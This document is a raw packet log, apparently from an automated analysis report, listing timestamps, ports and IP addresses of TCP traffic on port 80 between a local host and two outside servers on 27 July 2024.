Jul 27, 2024 07:30:06.488327980 CEST	51806	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:06.492016077 CEST	51807	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:06.493119955 CEST	80	51806	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:06.496965885 CEST	80	51807	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:06.497066021 CEST	51807	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:06.497216940 CEST	51807	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:06.497251987 CEST	51807	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:06.501985073 CEST	80	51807	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:06.501995087 CEST	80	51807	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:08.032171011 CEST	80	51807	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:08.032223940 CEST	80	51807	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:08.032304049 CEST	51807	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:08.032546043 CEST	51807	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:08.034452915 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.037321091 CEST	80	51807	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:08.039347887 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.040503025 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.040503025 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.045361996 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.617542982 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.617571115 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.617588043 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.617603064 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.617619038 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.617634058 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.617650032 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.617650986 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.617835045 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.617851019 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.617858887 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.617866993 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.617882013 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.617983103 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.622677088 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.622704029 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.622950077 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.704550982 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.704574108 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.704587936 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.704596996 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.704742908 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.704832077 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.704894066 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.704910994 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.704936981 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.704936981 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.705018997 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.705035925 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.705096960 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.705096960 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.705765009 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.705825090 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.705841064 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.705863953 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.705967903 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.705986023 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.706152916 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.706701040 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.706763029 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.706779957 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.706829071 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.706829071 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.706886053 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.706902981 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.707087040 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.707643986 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.707710981 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.707946062 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.709778070 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.757935047 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.791007042 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.791043043 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.791078091 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.791094065 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.791183949 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.791183949 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.791321039 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.791337013 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.791352987 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.791387081 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.791399956 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.791418076 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.791431904 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.791446924 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.791462898 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.791508913 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.791605949 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.791621923 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.791637897 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.791655064 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.791678905 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.791678905 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.792404890 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.792421103 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.792437077 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.792519093 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.792519093 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.792714119 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.792730093 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.792745113 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.792759895 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.793092966 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.793092966 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.793215990 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.793268919 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.793284893 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.793339014 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.793621063 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.793637037 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.793652058 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.793668985 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.793706894 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.793706894 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.794142962 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.794195890 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.794195890 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.794213057 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.794264078 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.794365883 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.794382095 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.794397116 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.794413090 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.794435978 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.794648886 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.795053005 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.795118093 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.795134068 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.795278072 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.795293093 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.795308113 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.795322895 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.795459986 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.795459986 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.795459986 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.796040058 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.796056032 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.796505928 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.877855062 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.877887964 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.878563881 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.878603935 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.878621101 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.878623962 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.878786087 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.878803015 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.878818989 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.878834009 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.879087925 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.879101992 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.879110098 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.879117966 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.879141092 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.879142046 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.879142046 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.879322052 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.879338026 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.879354000 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.879368067 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.879385948 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.879401922 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.879401922 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.879401922 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.879436016 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.879647017 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.879662991 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.879678011 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.879693031 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.879709005 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.879719973 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.879726887 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.879734039 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.879968882 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.879990101 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.880048990 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.880065918 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.880191088 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.880213022 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.880228996 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.880243063 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.880260944 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.880260944 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.880260944 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.880458117 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.880490065 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.880506039 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.880516052 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.880532026 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.880803108 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.880882025 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.880897999 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.881037951 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.881061077 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.881078005 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.881078005 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.881078005 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.881078959 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.881095886 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.881237030 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.881237030 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.881277084 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.881294966 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.881309986 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.881325006 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.881336927 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.881710052 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.881793022 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.881808043 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.881942987 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.881958008 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.881973028 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.881988049 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.882198095 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.882213116 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.882227898 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.882272959 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.882272959 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.882272959 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.882272959 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.882272959 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.882272959 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.882337093 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.882625103 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.882672071 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.882688046 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.882811069 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.882824898 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.882827997 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.882827997 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.882843018 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.882858992 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.882870913 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.882905960 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.882975101 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.883050919 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.883065939 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.883081913 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.883500099 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.883500099 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.883533001 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.883563995 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.883579969 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.883697987 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.883697987 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.883714914 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.883732080 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.883778095 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.883778095 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.965044975 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.965069056 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.965086937 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.965111017 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.965154886 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.965176105 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.965190887 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.965207100 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.965245962 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.965245962 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.965450048 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.965466022 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.965481043 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.965497017 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.965512037 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.965512037 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.965528965 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.965544939 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.965559006 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.965559006 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.965647936 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.965795040 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.965965033 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.965986967 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.966001987 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.966016054 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.966041088 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.966056108 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.966068983 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.966068983 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.966069937 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.966087103 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.966094017 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.966105938 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.966151953 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.966151953 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.966574907 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.966592073 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.966607094 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.966628075 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.966644049 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.966655970 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.966660023 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.966670990 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.966676950 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.966697931 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.966713905 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.966728926 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.966728926 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.966742992 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.966830969 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.967262030 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.967281103 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.967302084 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.967319965 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.967339039 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.967348099 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.967365026 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.967381001 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.967395067 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.967411041 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.967431068 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.967448950 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.967458010 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.967458010 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.967458010 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.967474937 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.967931986 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.967948914 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.967963934 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.967987061 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.968003035 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.968018055 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.968031883 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.968050003 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.968473911 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.968506098 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.968506098 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.968506098 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.968506098 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.968506098 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.968513012 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.968530893 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.968547106 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.968561888 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.968576908 CEST	80	51808	64.190.113.113	192.168.2.5
